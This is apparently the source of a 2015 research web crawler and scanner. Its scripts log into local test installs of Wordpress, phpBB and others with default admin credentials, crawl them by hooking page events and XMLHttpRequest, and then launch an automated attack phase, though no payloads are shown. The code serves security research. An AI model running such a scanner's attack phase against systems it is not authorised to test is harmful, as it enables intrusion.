# write the log to a file instead.
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s: %(levelname)s - %(message)s',
                    #filename='Attack.log',
                    #filemode='w'
                    )
34 |
if __name__ == '__main__':
    logging.info("Crawler started...")

    # Example: crawl a Wordpress installation as a logged-in user.
    # User(db_name, privilege_level, login_url, login_data, session) --
    # the login_data keys are the field names of the login form.
    user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")

    # NOTE(review): the start url uses port 80 while the login url above uses
    # 8080 -- confirm both point at the same installation.
    url = "http://localhost/"

    # This is the configuration used for the experiments.
    crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast)
    attack_config = AttackConfig(url)

    # dropping=True presumably drops any existing database of the same name
    # before crawling -- verify in DatabaseManager.
    database_manager = DatabaseManager(user, dropping=True)
    # Uncomment the end of the next line to route traffic through a proxy.
    crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    crawler.crawl(user)
    logging.info("Crawler finished")

    # Attack phase: replays what the crawler found with attack payloads.
    logging.info("Start attacking...")
    attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    attacker.attack(user)
    logging.info("Finish attacking...")
--------------------------------------------------------------------------------
/crawler/experiments_paper.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 | Created on 12.11.2014
18 |
19 | @author: constantin
20 | '''
21 | import logging
22 |
23 | from attacker import Attacker
24 | from crawler import Crawler
25 | from database.databasemanager import DatabaseManager
26 | from utils.config import CrawlConfig, AttackConfig
27 | from models.utils import CrawlSpeed
28 | from utils.user import User
29 | import csv
30 | from utils.utils import calculate_similarity_between_pages
31 |
# Console logging at DEBUG level; uncomment filename/filemode to log to a
# file instead.
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s: %(levelname)s - %(message)s',
                    #datefmt='%d.%m.%Y %H:%M:%S.%f',
                    #filename='Attack.log',
                    #filemode='w'
                    )
38 |
if __name__ == '__main__':
    logging.info("Crawler started...")

    # Target configurations used for the paper experiments -- keep exactly
    # one User line uncommented. Each User bundles the database name, the
    # login url and the login-form field names/values for that application.
    #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
    #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username" : "admin", "pass" : "admin"})
    user = User("Test42", 0, "http://localhost:8080/", login_data = {"user": "admin", "password": "admin"}, session="ABC")
    #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"})
    #user = User("Gallery2", 0, "http://localhost:8080/", login_data= {"name": "admin", "password": "34edbc"}, session= "ABC")
    #user = User("Gallery41", 0, session="ABC")
    #user = User("PHPbb64", 0, "http://localhost:8080/phpbb/ucp.php?mode=login", login_data = {"username": "admin", "password": "adminadmin"}, session= "ABC")
    #user = User("Joomla", 0, "http://localhost:8080/", login_data = {"username": "admin", "password": "admin"}, session= "ABC")
    #user = User("ModX", 0 , "http://localhost:8080/manager/", login_data= {"username": "admin", "password": "adminadmin"}, session="ABC")
    #user = User("Pimcore", 0, "http://localhost:8080/admin/login/", login_data={"username": "admin", "password": "admin"}, session="ABC")
    #user = User("Piwigo", 0, "http://localhost:8080/", login_data={"username": "admin", "password": "admin"}, session="ABC")
    #user = User("Concret5", 0, "http://localhost:8080/index.php/login", login_data={"uName": "admin", "uPassword": "admin"})
    #user = User("Mediawiki", 0)
    #user = User("MyBB2", 0, "http://localhost:8080/index.php", login_data= {"quick_username": "admin", "quick_password": "admin"}, session="ABC")
    #user = User("MyBB2", 0, "http://localhost:8080/admin/index.php", login_data= {"username": "admin", "password": "admin"}, session="ABC")
    #user = User("local", 0)

    url = "http://localhost:8080/"
    crawler_config = CrawlConfig("Database Name", url, max_depth=2, max_click_depth=5, crawl_speed=CrawlSpeed.Fast)
    attack_config = AttackConfig(url)

    database_manager = DatabaseManager(user, dropping=True)
    crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    crawler.crawl(user)
    # TODO: It seems to be that, there is an error if we instanciate crawler and attacker and then call the crawl function. Maybe use one global app!
    logging.info("Crawler finished")
    logging.info("Start attacking...")
    # Attack phase disabled for this experiment run.
    #attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    #attacker.attack(user)
    logging.info("Finish attacking...")
72 |
--------------------------------------------------------------------------------
/crawler/js/addeventlistener_wrapper.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 |
19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery
20 | callbackWrap(Element.prototype, "addEventListener", 1, addEventListenerWrapper);
21 | callbackWrap(Document.prototype, "addEventListener", 1,
22 | bodyAddEventListenerWrapper);
--------------------------------------------------------------------------------
/crawler/js/ajax_interceptor.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 | // This js wrapps the open function from XMLHttpRequest
19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen);
20 | callInterceptionWrapper(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend);
--------------------------------------------------------------------------------
/crawler/js/ajax_observer.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 | // This js wrapps the open function from XMLHttpRequest
19 | callbackWrap(XMLHttpRequest.prototype, 'open', 0, XMLHTTPObserverOpen);
20 | callbackWrap(XMLHttpRequest.prototype, 'send', 0, XMLHTTPObserverSend);
--------------------------------------------------------------------------------
/crawler/js/lib.js:
--------------------------------------------------------------------------------
1 | /*
2 | * Simulate.js from https://github.com/airportyh/simulate.js
3 | */
// Vendored Simulate.js: fires synthetic DOM events (click, key events,
// change, ...) on page elements so the crawler can trigger handlers.
!function() {
	// Shallow-copy every key of src onto dst.
	function extend(dst, src) {
		for ( var key in src)
			dst[key] = src[key]
		return src
	}
	var Simulate = {
		// Dispatch a simple, bubbling HTML event on element.
		event : function(element, eventName) {
			if (document.createEvent) {
				var evt = document.createEvent("HTMLEvents")
				evt.initEvent(eventName, true, true)
				element.dispatchEvent(evt)
			} else {
				// Legacy IE fallback path.
				var evt = document.createEventObject()
				element.fireEvent('on' + eventName, evt)
			}
		},
		// Dispatch a keyboard event; options may override the defaults in e.
		keyEvent : function(element, type, options) {
			var evt, e = {
				bubbles : true,
				cancelable : true,
				view : window,
				ctrlKey : false,
				altKey : false,
				shiftKey : false,
				metaKey : false,
				keyCode : 0,
				charCode : 0
			}
			extend(e, options)
			if (document.createEvent) {
				try {
					evt = document.createEvent('KeyEvents')
					evt.initKeyEvent(type, e.bubbles, e.cancelable, e.view,
							e.ctrlKey, e.altKey, e.shiftKey, e.metaKey,
							e.keyCode, e.charCode)
					element.dispatchEvent(evt)
				} catch (err) {
					// Browsers without initKeyEvent: fall back to a generic
					// event carrying the same key fields.
					evt = document.createEvent("Events")
					evt.initEvent(type, e.bubbles, e.cancelable)
					extend(evt, {
						view : e.view,
						ctrlKey : e.ctrlKey,
						altKey : e.altKey,
						shiftKey : e.shiftKey,
						metaKey : e.metaKey,
						keyCode : e.keyCode,
						charCode : e.charCode
					})
					element.dispatchEvent(evt)
				}
			}
		}
	}
	Simulate.keypress = function(element, chr) {
		var charCode = chr.charCodeAt(0)
		this.keyEvent(element, 'keypress', {
			keyCode : charCode,
			charCode : charCode
		})
	}
	Simulate.keydown = function(element, chr) {
		var charCode = chr.charCodeAt(0)
		this.keyEvent(element, 'keydown', {
			keyCode : charCode,
			charCode : charCode
		})
	}
	Simulate.keyup = function(element, chr) {
		var charCode = chr.charCodeAt(0)
		this.keyEvent(element, 'keyup', {
			keyCode : charCode,
			charCode : charCode
		})
	}
	// "change" is dispatched with bubbles=false, unlike Simulate.event.
	Simulate.change = function(element) {
		var evt = document.createEvent("HTMLEvents");
		evt.initEvent("change", false, true);
		element.dispatchEvent(evt);

	}
	//Simulate.click = function(element){
	//	element.click();
	//}
	// Generate Simulate.click, Simulate.focus, ... for every simple event.
	var events = ['click','focus', 'blur', 'dblclick', 'input', 'mousedown',
			'mousemove', 'mouseout', 'mouseover', 'mouseup', 'resize',
			'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave' ]
	for (var i = events.length; i--;) {
		var event = events[i]
		Simulate[event] = (function(evt) {
			return function(element) {
				this.event(element, evt)
			}
		}(event))
	}
	// Export: CommonJS module, browser global, or AMD define.
	if (typeof module !== 'undefined') {
		module.exports = Simulate
	} else if (typeof window !== 'undefined') {
		window.Simulate = Simulate
	} else if (typeof define !== 'undefined') {
		define(function() {
			return Simulate
		})
	}
}();
109 | /*
110 | * From down here
111 | *
112 | *Copyright (C) 2015 Constantin Tschuertz
113 | *
114 | * This program is free software: you can redistribute it and/or modify
115 | * it under the terms of the GNU General Public License as published by
116 | * the Free Software Foundation, either version 3 of the License, or
117 | * any later version.
118 | *
119 | *This program is distributed in the hope that it will be useful,
120 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
121 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
122 | * GNU General Public License for more details.
123 | *
124 | * You should have received a copy of the GNU General Public License
125 | * along with this program. If not, see .
126 | *
127 | */
128 |
129 |
function callbackWrap(object, property, argumentIndex, wrapperFactory) {
    // Replace object[property] with a proxy that first reports the call to
    // wrapperFactory(this, arguments) and then delegates to the original
    // implementation, preserving its return value. Returns the original
    // function so callers could restore it. (argumentIndex is unused.)
    var original = object[property];
    var proxy = function () {
        wrapperFactory(this, arguments);
        return original.apply(this, arguments);
    };
    object[property] = proxy;
    return original;
}
138 |
// Bounds (in milliseconds) for timer delays clamped by timingCallbackWrap
// below; min_waiting_time is declared but currently not enforced.
var max_waiting_time = 65000
var min_waiting_time = 0
141 |
function timingCallbackWrap(object, property, argumentIndex, wrapperFactory) {
    // Wrap a timer function (setTimeout/setInterval): each registration is
    // reported to wrapperFactory, and overly long delays (arguments[1]) are
    // clamped to max_waiting_time so a page cannot park work beyond the
    // crawler's patience. Returns the original function. (argumentIndex and
    // min_waiting_time are unused here.)
    var original = object[property];
    var clampingProxy = function () {
        if (arguments[1] > max_waiting_time) {
            arguments[1] = max_waiting_time;
        }
        wrapperFactory(this, arguments);
        return original.apply(this, arguments);
    };
    object[property] = clampingProxy;
    return original;
}
154 |
function callInterceptionWrapper(object, property, argumentIndex,
        wrapperFactory) {
    // Replace object[property] so every call is ONLY reported to
    // wrapperFactory; the original implementation is never executed and the
    // call yields null (used to observe XHR.send() without dispatching the
    // request). Returns the original function. (argumentIndex is unused.)
    var original = object[property];
    var interceptor = function () {
        wrapperFactory(this, arguments);
        return null;
    };
    object[property] = interceptor;
    return original;
}
164 |
function XMLHTTPObserverOpen(elem, args) {
    // Report an XMLHttpRequest.open() call to the Python side via the
    // injected `jswrapper` bridge. args mirrors open(method, url, ...).
    // FIX: resp/random_num were implicit globals (clobbered across calls
    // and illegal in strict mode); they are now var-declared locals.
    var resp = {
        "url" : args[1],
        "method" : args[0]
    };
    // Tag the request object so open/send events can be correlated later.
    var random_num = Math.floor((Math.random() * 10000) + 1);
    elem.jaeks_id = random_num;
    jswrapper.xmlHTTPRequestOpen(JSON.stringify(resp));
}
176 |
function XMLHTTPObserverSend(elem, args) {
    // Forward the arguments of an XMLHttpRequest.send() call (the request
    // body/parameters) to the Python `jswrapper` bridge.
    // FIX: elems/i/resp were implicit globals; now var-declared locals.
    var elems = [];
    for (var i = 0; i < args.length; i++) {
        elems.push(args[i]);
    }
    var resp = {
        "parameters" : elems
    };
    jswrapper.xmlHTTPRequestSend(JSON.stringify(resp));
}
189 |
function timeoutWrapper(elem, args) {
    // Report a setTimeout() registration: MD5 of the callback's source code
    // (as a stable id) plus the requested delay, sent over `jswrapper`.
    // FIX: function_id/resp were implicit globals; now var-declared locals.
    var function_id = MD5(args[0].toString());
    var resp = {
        "function_id" : function_id,
        "time" : args[1]
    };
    jswrapper.timeout(JSON.stringify(resp));
}
199 |
function intervallWrapper(elem, args) {
    // Report a setInterval() registration: MD5 of the callback's source code
    // plus the interval length, sent over `jswrapper`.
    // FIX: function_id/resp were implicit globals; now var-declared locals.
    var function_id = MD5(args[0].toString());
    var resp = {
        "function_id" : function_id,
        "time" : args[1]
    };
    jswrapper.intervall(JSON.stringify(resp));
}
209 |
function getXPath(element) {
    // Build an absolute XPath (e.g. "/html/body/div[2]/a") for `element` by
    // walking up the tree and counting same-tag siblings on each level.
    // Returns "" on any error.
    try {
        var path = '';
        var node = element;
        while (node && node.nodeType == 1) {
            // Collect the siblings sharing this node's tag name.
            var siblings = node.parentNode.childNodes;
            var sameTag = [];
            for (var i = 0; i < siblings.length; i++) {
                if (node.tagName === siblings[i].tagName) {
                    sameTag.push(siblings[i]);
                }
            }
            // 1-based position among same-tag siblings; only emit an index
            // when the node is not the first one.
            var position = sameTag.indexOf(node) + 1;
            var index = position > 1 ? '[' + position + ']' : '';
            path = '/' + node.tagName.toLowerCase() + index + path;
            node = node.parentNode;
        }
        return path;
    } catch (e) {
        console.log("Error: " + e)
        return "";
    }
}
232 |
function addEventListenerWrapper(elem, args) {
    // Called whenever a page registers a listener via addEventListener.
    // args = [eventName, handler, ...]. Reports the listener to the Python
    // `jswrapper` bridge and, for "change"/"click" listeners on containers,
    // also reports the child elements (radio/checkbox inputs, selects,
    // options, table buttons) the handler implicitly makes interactive.
    //
    // FIXES vs. the original:
    //  * the option loop indexed `options[i]` with a stale counter from the
    //    previous loops, reporting the wrong element repeatedly -- it now
    //    uses its own index;
    //  * all locals are var-declared instead of leaking as globals.

    // Serialize one element/event pair and hand it to the bridge.
    function report(target, eventName, functionId) {
        var entry = {
            "event" : eventName,
            "function_id" : functionId,
            "addr" : getXPath(target),
            "id" : target.id,
            "tag" : target.tagName,
            "class" : target.className
        };
        jswrapper.add_eventListener_to_element(JSON.stringify(entry));
    }

    var dom_adress = getXPath(elem);
    if (dom_adress.indexOf("/html/body") == -1) {
        console.log("Domadress is not valid: " + dom_adress);
        return;
    }
    var tag = elem.tagName;
    // Hash of the handler source identifies the callback across reports.
    var function_id = MD5(args[1].toString());
    var resp = {
        "event" : args[0],
        "function_id" : function_id,
        "addr" : dom_adress,
        "id" : elem.id,
        "tag" : tag,
        "class" : elem.className
    };
    jswrapper.add_eventListener_to_element(JSON.stringify(resp));

    if (args[0] == "change") {
        var inputs = elem.querySelectorAll("input");
        var selects = elem.querySelectorAll("select");
        var options = elem.querySelectorAll("option");

        for (var i = 0; i < inputs.length; i++) {
            var type = inputs[i].getAttribute("type");
            if (type == "radio" || type == "checkbox") {
                report(inputs[i], "change", "");
            }
        }
        for (var j = 0; j < selects.length; j++) {
            report(selects[j], "change", "");
        }
        for (var k = 0; k < options.length; k++) {
            report(options[k], "change", "");
        }
    }
    if (tag == "TABLE" && args[0] == "click") {
        // Buttons inside a click-handled table are clickables of their own.
        var candidates = elem.querySelectorAll("button");
        for (var c = 0; c < candidates.length; c++) {
            report(candidates[c], "click", "");
        }
    }
}
343 |
function bodyAddEventListenerWrapper(elem, args) {
    // Document-level addEventListener wrapper: listeners registered on the
    // document are reported with the fixed address "/html/body" and tag
    // "body". FIX: all locals are var-declared instead of leaking globals.
    var resp = {
        "event" : args[0],
        "function_id" : MD5(args[1].toString()),
        "addr" : "/html/body",
        "id" : elem.id,
        "tag" : "body",
        "class" : elem.className
    };
    jswrapper.add_eventListener_to_element(JSON.stringify(resp));
}
363 |
364 |
--------------------------------------------------------------------------------
/crawler/js/property_obs.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 |
function catch_properties(){
    // Scan every element in the document for inline event-handler
    // properties (onclick, onmouseover, ...) and report each handler found
    // to the Python `jswrapper` bridge, identified by element XPath and an
    // MD5 hash of the handler source.
    //
    // FIXES vs. the original:
    //  * the 15 copy-pasted if-blocks are replaced by one data-driven loop;
    //  * the original tested the non-existent property "onblclick" (always
    //    undefined, so that branch could never fire) -- replaced by the real
    //    double-click property "ondblclick";
    //  * locals are var-declared instead of leaking as globals.
    var handler_names = ["onclick", "onmouseover", "onabort", "onblur",
                         "onchange", "ondblclick", "onerror", "onfocus",
                         "onkeydown", "onkeypress", "onkeyup", "onmousedown",
                         "onmousemove", "onmouseout", "onmouseup"];
    var elems = document.getElementsByTagName('*');
    for (var i = 0; i < elems.length; i++) {
        var elem = elems[i];
        var events = [];
        for (var h = 0; h < handler_names.length; h++) {
            var name = handler_names[h];
            if (elem[name] != null) {
                events.push({"method": name, "func": elem[name]});
            }
        }
        if (events.length > 0) {
            var dom_adress = getXPath(elem);
            for (var j = 0; j < events.length; j++) {
                var resp = {
                    "function_id" : MD5(events[j].func.toString()),
                    "event" : events[j].method,
                    "id" : elem.id,
                    "tag" : elem.tagName,
                    "addr" : dom_adress,
                    "class" : elem.className
                };
                // NOTE(review): lib.js calls add_eventListener_to_element
                // (capital L) -- confirm which spelling the bridge exports.
                jswrapper.add_eventlistener_to_element(JSON.stringify(resp));
            }
        }
    }
}

catch_properties();
--------------------------------------------------------------------------------
/crawler/js/timing_wrapper.js:
--------------------------------------------------------------------------------
1 | /*
2 | *Copyright (C) 2015 Constantin Tschuertz
3 | *
4 | * This program is free software: you can redistribute it and/or modify
5 | * it under the terms of the GNU General Public License as published by
6 | * the Free Software Foundation, either version 3 of the License, or
7 | * any later version.
8 | *
9 | *This program is distributed in the hope that it will be useful,
10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | * GNU General Public License for more details.
13 | *
14 | * You should have received a copy of the GNU General Public License
15 | * along with this program. If not, see .
16 | */
17 |
18 |
19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery
20 | timingCallbackWrap(window, "setTimeout", 0, timeoutWrapper);
21 | timingCallbackWrap(window, "setInterval", 0, intervallWrapper);
--------------------------------------------------------------------------------
/crawler/main.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import logging
20 |
21 | from attacker import Attacker
22 | from crawler import Crawler
23 | from database.databasemanager import DatabaseManager
24 | from utils.config import CrawlConfig, AttackConfig
25 | from models.utils import CrawlSpeed
26 | from utils.user import User
27 | import csv
28 | from utils.utils import calculate_similarity_between_pages
29 |
# Logging goes to the console at DEBUG level; uncomment the two lines below
# to write the log to a file instead.
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s: %(levelname)s - %(message)s',
                    #filename='Attack.log',
                    #filemode='w'
                    )
36 |
if __name__ == '__main__':


    # The first string of the User object names the crawl run and the
    # created database -- use a different name per run to keep old results.


    # Logged-in scan. Parameters: database name - privilege level
    # (deprecated, keep 0) - URL of the login form - login data as a dict
    # whose keys are the form's field names - session (deprecated, use "ABC").
    #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")


    # Crawl without a user session: database name - privilege level - session.
    user = User("Test", 0, session="ABC")

    url = "http://localhost/"
    # Crawler config: start url (independent of the login) - max_depth: link
    # depth - max_click_depth: event depth - crawl_speed (Fast works best).
    crawler_config = CrawlConfig("Some Name, doesn't matter", url, max_depth=1, max_click_depth=2, crawl_speed=CrawlSpeed.Fast)

    # From here on there is nothing to change, unless you want to skip the
    # attack phase (then comment out the attack lines at the bottom).
    logging.info("Crawler started...")
    database_manager = DatabaseManager(user, dropping=True)
    crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    crawler.crawl(user)
    logging.info("Crawler finished")

    # Comment out the lines below to disable attacking.
    logging.info("Start attacking...")
    attack_config = AttackConfig(url)
    attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
    attacker.attack(user)
    logging.info("Finish attacking...")
--------------------------------------------------------------------------------
/crawler/models/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
--------------------------------------------------------------------------------
/crawler/models/ajaxrequest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import hashlib
19 | from models.asyncrequests import AsyncRequests
20 |
21 |
class AjaxRequest(AsyncRequests):
    '''
    Models an Ajax-Request issued by an event.
    '''

    def __init__(self, method, url, trigger, parameters=None):
        """
        :param method: HTTP method of the request (e.g. "GET", "POST").
        :param url: target url; may be a Url object or a plain string.
        :param trigger: the clickable whose event fired this request.
        :param parameters: optional parameters (dict or raw query string).
        """
        super(AjaxRequest, self).__init__(method, url, parameters)
        self.trigger = trigger

    def toString(self):
        msg = "[Ajax - Methode: " + self.method + " - Url: "+ self.url.toString() + " - Trigger: " + self.trigger.toString() + " \n"
        for param_pair in self.parameters if self.parameters is not None else []:
            msg += " - Parameter pair: " + str(param_pair)
        return msg

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        # Url objects expose complete_url; plain string urls are compared as-is.
        try:
            url = self.url.complete_url
        except AttributeError:
            url = self.url
        try:
            o_url = other.url.complete_url
        except AttributeError:
            o_url = other.url

        return self.method == other.method and url == o_url and self.trigger == other.trigger

    def __ne__(self, other):
        # Bug fix: this was defined as __neg__ (unary minus) and called
        # self.__eq__() without an argument, which raised TypeError.
        return not self.__eq__(other)
52 |
53 |
--------------------------------------------------------------------------------
/crawler/models/asyncrequests.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import hashlib
class AsyncRequests():
    """Base class for asynchronous (XHR-style) requests recorded by the crawler."""

    def __init__(self, method, url, parameters=None):
        """
        :param method: HTTP method of the request.
        :param url: Url object (must expose abstract_url for hashing) or string.
        :param parameters: dict, raw query string ("a=1&b=2"), or None.
        """
        self.method = method
        self.url = url
        self.request_structure = None
        self.structure = None

        self.parameters = parameters
        # Normalize a raw query string into a dict sorted by key so that
        # hashing below is deterministic.
        if not isinstance(self.parameters, dict) and self.parameters is not None:
            self.handle_parameters()

    @property
    def request_hash(self):
        try:
            return self.get_hash()
        except AttributeError:
            # url has no abstract_url yet - it must be analyzed first.
            raise AttributeError("You need first to analyze url")

    def handle_parameters(self):
        """Parse self.parameters from a query string into a key-sorted dict."""
        try:
            key_value_pairs = self.parameters.split("&")
        except AttributeError:
            # Not a string (and not a dict) - nothing we can parse.
            self.parameters = None
            return
        tmp = {}
        for key_value_pair in key_value_pairs:
            try:
                key, value = key_value_pair.split("=")
            except ValueError:
                # Malformed pair (no "=" or more than one) - skip it.
                continue
            tmp[key] = value
        self.parameters = dict(sorted(tmp.items()))

    def get_hash(self):
        """MD5 over abstract url, method and the parameter names."""
        s_to_hash = self.url.abstract_url + "+" + self.method
        try:
            # Bug fix: the old code hashed x[0], i.e. only the FIRST CHARACTER
            # of each parameter name; iterate the full key names instead
            # (consistent with Url.get_hash).
            for k in self.parameters:
                s_to_hash += "++" + k
        except TypeError:
            # parameters is None - hash url + method only.
            pass
        b_to_hash = s_to_hash.encode("utf-8")
        d = hashlib.md5()
        d.update(b_to_hash)
        return d.hexdigest()
--------------------------------------------------------------------------------
/crawler/models/asyncrequeststructure.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
class AsyncRequestStructure():
    """Abstract description of an async request: a structure hash plus
    optional parameter information."""

    def __init__(self, structure_hash, parameters=None):
        # Hash identifying the request structure.
        self.structure_hash = structure_hash
        # Optional parameter description; None when the request carries none.
        self.parameters = parameters
--------------------------------------------------------------------------------
/crawler/models/clickable.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
import hashlib

from models.clickabletype import ClickableType
from models.utils import levenshtein
20 |
21 |
class Clickable():
    '''
    Models interesting element with events as attributes
    '''

    def __init__(self, event, tag, dom_address, id = None, html_class = None, clickable_depth = None, function_id = None):
        self.event = event                      # e.g. "click"
        self.tag = tag                          # HTML tag name
        self.dom_address = dom_address          # address of the element in the DOM
        self.id = id
        self.html_class = html_class
        self.links_to = None                    # set once the target is known
        self.clicked = False
        self.clickable_type = None              # ClickableType, set after triggering
        self.clickable_depth = clickable_depth
        self.function_id = function_id

    def toString(self):
        """Human-readable one-line summary of this clickable."""
        msg = ""
        msg += "[TAG: " + self.tag
        if self.id is not None and not self.id == "":
